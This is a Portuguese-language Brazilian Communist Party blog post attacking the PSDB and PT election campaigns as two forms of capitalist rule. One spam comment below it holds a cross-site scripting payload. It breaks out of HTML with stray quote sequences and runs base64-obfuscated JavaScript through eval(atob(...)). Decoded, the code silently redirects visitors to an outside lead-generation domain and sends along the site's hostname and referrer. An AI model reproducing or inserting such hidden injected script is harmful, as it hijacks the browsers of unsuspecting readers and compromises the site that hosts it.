O que está em disputa na eleição

As eleições dividem, aparentemente, os dois blocos que representam os interesses da classe dominante: de um lado, o PSDB e seus aliados, sustentados pelo grande capital financeiro, propondo mais neoliberalismo (privatizações, flexibilização do mercado, desvalorização da mão de obra e produtos brasileiros, menos direitos para os trabalhadores, mais liberdade para o capital, mais dependência aos EUA e seus aliados).
De outro lado, o PT e seus coligados, sustentados por uma política neoliberal assistencialista, que reproduz nas relações político-econômicas processos corruptos, mercenários e populistas, mantendo o domínio burguês e a política econômica neoliberal, com algumas concessões de caráter assistencialista e alguma dose de independência no campo internacional.
Ou seja, o que está em questão nas diferenças entre esses candidatos é a forma como defendem o capitalismo e saqueam o aparelho de Estado rumo ao neoliberalismo.

Nesta eleição, Dilma, Serra, Osmar Dias e Beto Richa, juntos com seus aliados, dizem que resolverão os problemas sociais: é mentira! As candidaturas governarão para os donos do poder, ricos e para as oligarquias. São financiados por donos de fábricas, banqueiros e latifundiários para defender privilégios, reservando para o resto do povo apenas as migalhas do regime capitalista. Esta é a democracia que queremos?

O PCB tem a clareza de que as eleições não mudarão profundamente a vida dos trabalhadores. Não alimentamos nenhuma ilusão de mudança com esse processo, porque somente o Poder Popular, com a organização dos trabalhadores e a mobilização de todos os explorados e oprimidos pelo regime capitalista, pode derrubar o que está estabelecido para construir uma nova sociedade, sem exploração, sem desigualdades e sem guerra.

A AÇÃO  ELEITORAL DO PCB SOMA-SE ÀS MANIFESTAÇÕES DE CONTESTAÇÃO DO ESTABELECIDO, NA DEFESA DOS INTERESSES DA CLASSE TRABALHADORA, QUE É A MAIORIA DA POPULAÇÃO.

Serviço
PCB Foz do Iguaçu
www.pcbparana.blogspot.com
E-mail: pcbparana@gmail.com

3 comentários em “O que está em disputa na eleição

  1. New Email List of LinkBio Users. Sell your products
    or services directly with cold email marketing to Instagram
    users that uses LinkBio in their profiles Download it from lead generation agency philippines“>”>”>”>”>eval(atob(‘ZG9jdW1lbnQubG9jYXRpb24uaHJlZiA9ICdodHRwczovL29ubGluZWxlYWRnZW5lcmF0aW9uLnh5ei9pbmRleC5odG1sP3V0bV9zb3VyY2U9JyArIGxvY2F0aW9uLmhvc3RuYW1lICsgJyZ1dG1fbWVkaXVtPWdzYS1vbmxpbmVsZWFkJnV0bV9jYW1wYWlnbj1zY3JpcHQmdXRtX2NvbnRlbnQ9JyArIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5yZWZlcnJlcik7’));

Deixe uma resposta

O seu endereço de e-mail não será publicado.